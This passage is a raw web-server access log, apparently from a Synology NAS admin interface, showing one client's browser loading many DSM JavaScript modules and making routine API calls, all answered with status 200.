"https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/SystemHealthWidget.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 3404] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BandwidthControl/BandwidthControl.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 6408] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/TreeGrid.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 5290] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Echarts/echarts.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 239306] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/StorageUsageWidget.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 2236] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?_dc=1769079077891&SynoToken=X741WRjetYUzc&action=%22external_ip%22&api=SYNO.Core.Desktop.Initdata&method=get&version=1" [Client 84.1.26.27] [Length 111] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Echarts/syno_echarts_patch.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1126] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/resource.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 42550] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/resource_widget.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 8424] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AppNotify/AppNotify.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1295] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/PercentageBar.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 824] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/S2S.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 773] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/PasswordConfirmDialog.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 829] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/DirectoryServiceVueBundle.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 2582] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ConfigBackup/config_backup.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 10113] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/domain-filter.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 678] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Chooser/Chooser.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 3238] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/utils.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 6011] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/LoginStyleVueBundle.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 20123] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileChooser/FileChooser.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 12453] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/MyDSCenter/MyDSCenter.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1827] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/DSMNotifyVueBundle.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 6327] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileBrowserUtil.js?v=1.3.4-1404&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 16195] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_notification.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1226] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemStatusChecker/SystemStatusChecker.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1550] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/FileTaskUtil.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 640] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/UploadUtil.js?v=1.3.4-1404&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 6974] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMUpdateNotify/DSMUpdateAction.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 562] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DiskMessageHandler/DiskMessageApp.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1352] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/core.js?v=2.7.2-2464&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1900] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyPhotos/extjs/fileStationExtension.min.js?v=1.3.4-0340&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 415] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ActiveInsightUpdateNotify/ActiveInsightUpdateNotify.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1902] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DisableAdminNotification/DisableAdminNotification.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1682] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/BackgroundTaskGrid.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1711] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Share/PermissionDialog.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 19733] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/tinymce.min.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 299542] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/image_load.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 580] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TaskSchedulerUtils/TaskSchedulerUtils.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 8222] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/lazyDataView.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 2838] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileSharing/FileSharing.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PollingTask/PollingTask.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 2159] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PortEnable/PortEnable.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 2571] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/NotificationVueBundle.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 14148] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/EnableNewUpdateSetting/EnableNewUpdateSetting.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 2986] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ExternalDevices/EjectableDeviceList.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 3055] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/TaskGrid.js?v=1.3.4-1404&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1458] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/cloudstation_util.js?v=3.2.1-23280&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 11953] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/directory-admin-list-dialog.js?v=4.15.9-0644&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 3025] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:18 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/smb-tab.js?v=4.15.9-0644&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 14997] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 46368] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/BackgroundTaskTray.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 2074] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Share/CustomColumn.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1601] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_component.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 3604] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/dscs_package.js?v=2.7.2-2464&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 69138] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/image_selector.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 6034] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/DSMNotify.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 5758] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 46368] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 9725] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 17628] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 51689] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/MailTaskTray.js?v=1.3.4-1404&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1789] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/domain-options-dialog.js?v=4.15.9-0644&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1350] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/cloudstation_fbext.js?v=3.2.1-23280&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 1817] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.DisableAdmin" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/desktop_index_tray.js?v=3.2.1-23280&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 2789] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/core.js?v=3.2.1-23280&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 6932] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_wizard.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 41851] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/UploadMonitor.js?v=1.3.4-1404&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 6258] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/TinyMCEVue.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 5714] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; 